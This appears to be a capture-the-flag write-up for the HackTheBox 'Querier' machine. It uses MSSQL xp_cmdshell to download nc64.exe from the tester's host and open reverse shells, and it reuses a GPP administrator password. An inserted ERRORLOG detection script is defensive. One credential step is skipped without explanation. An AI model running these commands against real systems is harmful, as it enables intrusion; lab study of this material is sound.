System: Windows
Content: MSSQL xp_cmdshell
The port scan results are as follows.
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.10.10.125:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-04T07:05:12+00:00; -7h00m00s from scanner time.
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-04T06:55:32
| Not valid after: 2055-01-04T06:55:32
| MD5: 6613:570a:3b9f:77b8:ed6e:3a43:0658:617a
|_SHA-1: 332a:bcc1:87d8:61cc:4ba6:e7cf:08d0:c95b:c570:b210
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Only SMB can be enumerated, so check the SMB shares with a null session.
~/D/q $smbclient -NL $IP
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
Enter the Reports directory of the SMB share with the guest account; any password works.
~/D/q $smbclient //$IP/Reports -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jan 29 00:23:48 2019
.. D 0 Tue Jan 29 00:23:48 2019
Currency Volume Report.xlsm A 12229 Sun Jan 27 23:21:34 2019
After downloading the xlsm file, the database connection code can be found in its macro.
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
After connecting to the database, enable xp_cmdshell.
~/D/q $mssqlclient.py -windows-auth mssql-svc:'corporate568'@$IP
SQL (QUERIER\mssql-svc dbo@master)> execute as login='sa'; exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE
SQL (sa dbo@master)> execute as login='sa'; exec master..xp_cmdshell 'whoami'
output
-----------------
querier\mssql-svc
NULL
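A defender-side detection for the step above, added here as an example and not part of the original writeup: SQL Server writes a line to its ERRORLOG for every sp_configure change, so the script below parses ERRORLOG-style lines, flags xp_cmdshell being switched on, and notes whether the same session unlocked 'show advanced options' just before, which is exactly the one-liner pattern shown. The sample log lines are constructed for this example; only the message text follows what SQL Server actually writes.

```python
import re
from datetime import datetime, timedelta

# ERRORLOG line layout: "<date> <time>.<frac> spid<N>  <message>"
LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+(?P<spid>spid\d+s?)\s+(?P<msg>.*)$")
# Message SQL Server writes for every sp_configure change
CONFIG_RE = re.compile(r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\.")

# Constructed sample lines mimicking the ERRORLOG format (not taken from any real host)
SAMPLE_ERRORLOG = """\
2019-01-28 23:10:01.10 spid9s      Server is listening on [ 'any' <ipv4> 1433].
2019-01-28 23:12:40.51 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2019-01-28 23:12:41.02 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2019-01-28 23:30:12.77 spid61      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2019-01-28 23:30:13.00 spid61      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
"""

def parse_config_changes(text):
    """Return (timestamp, spid, option, old, new) for each sp_configure change line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        c = CONFIG_RE.search(m.group("msg")) if m else None
        if not c:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
        events.append((ts, m.group("spid"), c.group("opt"), int(c.group("old")), int(c.group("new"))))
    return events

def find_xp_cmdshell_enablement(text, window=timedelta(minutes=5)):
    """Alert on xp_cmdshell being switched on; record whether the same session
    unlocked 'show advanced options' within `window` beforehand."""
    events = parse_config_changes(text)
    alerts = []
    for ts, spid, opt, old, new in events:
        if opt != "xp_cmdshell" or new != 1:
            continue
        primed = any(
            e_spid == spid and e_opt == "show advanced options" and e_new == 1
            and timedelta(0) <= ts - e_ts <= window
            for e_ts, e_spid, e_opt, _, e_new in events
        )
        alerts.append({"time": ts.isoformat(sep=" "), "spid": spid,
                       "previously_enabled": old == 1, "advanced_options_unlocked_first": primed})
    return alerts

if __name__ == "__main__":
    for alert in find_xp_cmdshell_enablement(SAMPLE_ERRORLOG):
        print("ALERT xp_cmdshell enabled:", alert)
```

On a real server the same lines can be pulled with xp_readerrorlog or read from the ERRORLOG file under the instance's Log directory; a 'changed from 1 to 1' line means the option was already on, which the `previously_enabled` flag distinguishes.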
Start an HTTP server locally, upload nc64.exe to a writable directory on the target, and get a reverse shell.
SQL (sa dbo@master)> execute as login='sa'; exec master..xp_cmdshell 'curl -o c:\users\mssql-svc\Documents\nc64.exe http://10.10.16.29/nc64.exe'
SQL (sa dbo@master)> execute as login='sa'; exec master..xp_cmdshell 'c:\users\mssql-svc\Documents\nc64.exe 10.10.16.29 1234 -e cmd.exe'
In the shell, upload and run winPEAS64.exe to enumerate useful information on the target; the administrator password can be found in a file.
Cached GPP Passwords
C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Found C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
UserName: Administrator
NewName: [BLANK]
cPassword: MyUnclesAreMarioAndLuigi!!1!
Changed: 2019-01-28 23:12:48
Found C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
UserName: Administrator
NewName: [BLANK]
cPassword: MyUnclesAreMarioAndLuigi!!1!
Changed: 2019-01-28 23:12:48
With the administrator password, upload RunasCs.exe and get a reverse shell as administrator.
c:\Users\mssql-svc\Documents>.\RunasCs.exe administrator MyUnclesAreMarioAndLuigi!!1! cmd.exe -r 10.10.16.29:2234
.\RunasCs.exe administrator MyUnclesAreMarioAndLuigi!!1! cmd.exe -r 10.10.16.29:2234
[*] Warning: LoadUserProfile failed due to insufficient permissions
[+] Running in session 0 with process function CreateProcessAsUserW()
[+] Using Station\Desktop: Service-0x0-20689$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 4640 created in background.
~/D/q $rlwrap nc -nlvp 2234
Listening on 0.0.0.0 2234
Connection received on 10.10.10.125 49736
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\System32>whoami
whoami
querier\administrator